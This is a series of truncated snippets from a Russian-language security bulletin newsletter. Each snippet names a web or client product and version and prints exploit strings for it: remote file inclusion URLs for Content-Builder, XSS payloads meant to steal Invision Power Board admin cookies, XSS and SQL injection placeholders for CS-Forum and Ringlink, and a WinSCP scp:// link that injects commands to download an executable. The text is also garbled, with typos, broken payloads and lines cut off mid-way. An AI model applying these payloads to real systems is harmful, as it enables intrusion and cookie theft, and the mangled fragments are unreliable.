Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Content-Builder.
Компьютер для продвинутых пользователей В этом выпуске: Content-Builder ПО: Content-Builder Версия: 0.7.5 Использование: http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path[cmd_url]/ http://example/[cb_path]/cms/plugins/media_manager/media.i...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Invision Power Board.
Компьютер для продвинутых пользователей В этом выпуске: Invision Power Board ПО: Invision Power Board Версия: 2.1.6 Уязвимость: Некоторые параметры не проверяются, что даёт возможность провести XSS-атака и украсть куки администратора. Использование : http://localhost/forum/admin.php?phpinfo=<script>alert)</script> Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в CS-Forum.
Компьютер для продвинутых пользователей В этом выпуске: CS-Forum ПО: CS-Forum Версия: 0.81 Использование : http://]/read.php?msg_result[XSS] http://]/read.php?rep_titre[XSS] Cookies: CSForum_nom[XSS]; CSForum_mail[XSS]; CSForum_url[XSS] * http://]/read.php?id=1[SQL_SELECT]...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в WinSCP.
Компьютер для продвинутых пользователей В этом выпуске: WinSCP ПО: WinSCP Версия: 3.8.1 О WinSCP: SFTP клиент для Windows использующий SSH и имеющий открытый код. Протокол Legacy SCP входит в поддержку. Уязвимость: Строка ввода (scp:// sftp://) не проверяется, что может нам обеспечить возможность вставлять любые команды. Если вы создадите HTML страницу со следующий содержанием: <a href"scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c%22%20%22get%201.exe%22%20exit>download malware.exe&...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Ringlink.
Компьютер для продвинутых пользователей В этом выпуске: Ringlink ПО: Ringlink Версия: 3.2 Сайт: http://www.ringlink.org Использование: http://www.example.com/ringlink/next.cgi?ringid[IMG%20SRC=javascript:alert'XSS] http://www.example.com/ringlink/stats.cgi?ringid[IMG%20SRC=javascript:alert'XSS] http://www.example.com/ringlink/list.cgi?ringid[IMG%20SRC=javascript:alert'XSS] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: IC...